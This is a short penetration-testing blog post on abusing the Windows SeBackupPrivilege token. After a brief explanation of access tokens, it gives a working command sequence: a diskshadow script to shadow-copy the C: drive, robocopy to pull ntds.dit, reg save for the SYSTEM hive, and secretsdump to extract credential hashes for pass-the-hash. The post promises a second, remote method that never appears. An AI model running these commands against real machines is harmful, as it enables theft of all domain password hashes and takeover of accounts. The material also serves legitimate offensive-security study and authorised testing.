Welcome to this post where we will see how to exploit the token «SeBackupPrivilege». We will see how to exploit it manually inside the compromised machine and the second method will be remotely from our attacker machine.
First of all, I will to an introduction to tokens in windows:
Each user logged onto the system holds an access token with security information for that logon session. The system creates an access token when the user logs on. Every process executed on behalf of the user has a copy of the access token. The token identifies the user, the user’s groups, and the user’s privileges. A token also contains a logon SID (Security Identifier) that identifies the current logon session.
I got the description from HackTricks.
The second description that we will need, it will be about «SeBackupPrivilege:
The system is caused to grant all read access control to any file (limited to read operations) by this privilege. It is utilized for reading the password hashes of local Administrator accounts from the registry, following which, tools like «psexec» or «wmiexec» can be used with the hash (Pass-the-Hash technique). However, this technique fails under two conditions: when the Local Administrator account is disabled, or when a policy is in place that removes administrative rights from Local Administrators connecting remotely.
I got the description from HackTrikcs.
Once we know what means each thing, we can proceed to exploit the token:
Check for tokens/privileges – Check for SeImpersonatePrivilege
whoami /priv
Based on that the user is part of the has assigned the token SeBackupPrivilege I can backup the system:
- Backup script saved as «diskshadow.txt»:
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "set metadata C:\\Windows\\Temp\\meta.cab" | out-file ./diskshadow.txt -encoding ascii -append
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
- Execute it with diskshadow:
diskshadow /s diskshadow.txt
Copy the NTDS file from the backup with robocopy:
robocopy /b Z:\\Windows\\ntds . ntds.dit
Copy the hives of System:
reg save hklm\\system c:\\Users\\d.chambers\\Documents\\system.bak
Download the files and extract the hashes:
secretsdump.py -ntds ntds.dit -system system.bak -hashes lmhash:nthash LOCAL
I hope you find this post useful in your engagements.
Happy Hacking!